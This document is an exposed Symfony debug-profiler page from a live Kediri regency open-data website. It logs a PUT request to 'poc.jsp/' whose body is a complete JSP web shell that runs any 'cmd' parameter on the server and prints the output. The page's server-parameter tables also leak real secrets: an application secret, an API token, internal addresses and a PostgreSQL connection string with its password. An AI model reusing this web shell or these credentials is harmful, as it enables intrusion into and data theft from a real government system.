n/a
Request
GET Parameters
Key | Value |
---|---|
p | "poc.jsp/" |
POST Parameters
Key | Value |
---|---|
<%@_page_import | """ "java.util.*,java.io.*"%>\r\n <%\r\n if (request.getParameter("cmd") != null) {\r\n out.println("Command: " request.getParameter("cmd") "<BR>");\r\n Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n %>\r\n """ |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_remove_csp_headers | true |
_stopwatch_token | "c25c1f" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
accept-encoding | "gzip" |
accept-language | "en" |
authorization | "" |
connection | "close" |
content-length | "575" |
content-type | "application/x-www-form-urlencoded" |
host | "opendata.kedirikab.go.id" |
user-agent | "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" |
x-forwarded-for | "192.168.60.9" |
x-forwarded-proto | "https" |
x-forwarded-scheme | "https" |
x-php-ob-level | "1" |
x-real-ip | "192.168.60.9" |
Request Content
Raw
<%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Thu, 26 Dec 2024 09:11:45 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22PUT%20http%3A%2F%2Fopendata.kedirikab.go.id%2Fpoc.jsp%2F%22" |
x-debug-exception-file | "%2Fvar%2Fwww%2Fhtml%2Fopen_data%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
x-debug-token | "663c74" |
x-debug-token-link | "http://opendata.kedirikab.go.id/_profiler/3ea89c" |
x-previous-debug-token | "3ea89c" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
API_TOKEN | "4a81432adf56aeb6aadfffa65ab70ab1" |
API_URL | "http://172.16.16.68/api_/opendata.php" |
APP_CLIENT_ADDRESS | "Jl. Sekartaji No.2, Sumber, Doko, Kec. Ngasem, Kabupaten Kediri, Jawa Timur" |
APP_CLIENT_CONTACT | "Telp. (0354) 682152" |
APP_CLIENT_EMAIL | "" |
APP_CLIENT_NAME | "Kabupaten Kediri" |
APP_CLIENT_SHORTNAME | "Kabupaten Kediri" |
APP_ENV | "dev" |
APP_ICON | "assets/logo/logo_masbup.png" |
APP_ICON_LOGO | "assets/logo/kota_kediri.png" |
APP_NAME | "Open Data Kediri" |
APP_SECRET | "302717838b52f3d1699a25e8e3ef6a9d" |
COLOR_DANGER | "#b20238;" |
COLOR_INFO | "#e8d21d;" |
COLOR_PRIMARY | "#039fbe;" |
COLOR_WARNING | "#cf1578;" |
DATABASE_URL | "postgresql://postgres:opendata2022!@127.0.0.1:5432/open_data_kediri?serverVersion=13&charset=utf8" |
OPEN_DATA_ICON | "assets/logo/logo_masbup_merah.png" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "575" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/var/www/html/open_data/public/" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/html/open_data/public/" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTP_ACCEPT | "*/*" |
HTTP_ACCEPT_ENCODING | "gzip" |
HTTP_ACCEPT_LANGUAGE | "en" |
HTTP_AUTHORIZATION | "" |
HTTP_CONNECTION | "close" |
HTTP_HOST | "opendata.kedirikab.go.id" |
HTTP_USER_AGENT | "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" |
HTTP_X_FORWARDED_FOR | "192.168.60.9" |
HTTP_X_FORWARDED_PROTO | "https" |
HTTP_X_FORWARDED_SCHEME | "https" |
HTTP_X_REAL_IP | "192.168.60.9" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "p=poc.jsp/" |
REDIRECT_QUERY_STRING | "p=poc.jsp/" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/poc.jsp/" |
REMOTE_ADDR | "172.16.25.100" |
REMOTE_PORT | "37732" |
REQUEST_METHOD | "PUT" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1735204305 |
REQUEST_TIME_FLOAT | 1735204305.018 |
REQUEST_URI | "/poc.jsp/" |
SCRIPT_FILENAME | "/var/www/html/open_data/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "172.16.16.52" |
SERVER_ADMIN | "[no address given]" |
SERVER_NAME | "opendata.kedirikab.go.id" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "" |
SERVER_SOFTWARE | "Apache" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,API_URL,API_TOKEN,APP_NAME,OPEN_DATA_ICON,APP_ICON,APP_ICON_LOGO,APP_CLIENT_NAME,APP_CLIENT_SHORTNAME,APP_CLIENT_ADDRESS,APP_CLIENT_CONTACT,APP_CLIENT_EMAIL,COLOR_PRIMARY,COLOR_WARNING,COLOR_INFO,COLOR_DANGER" |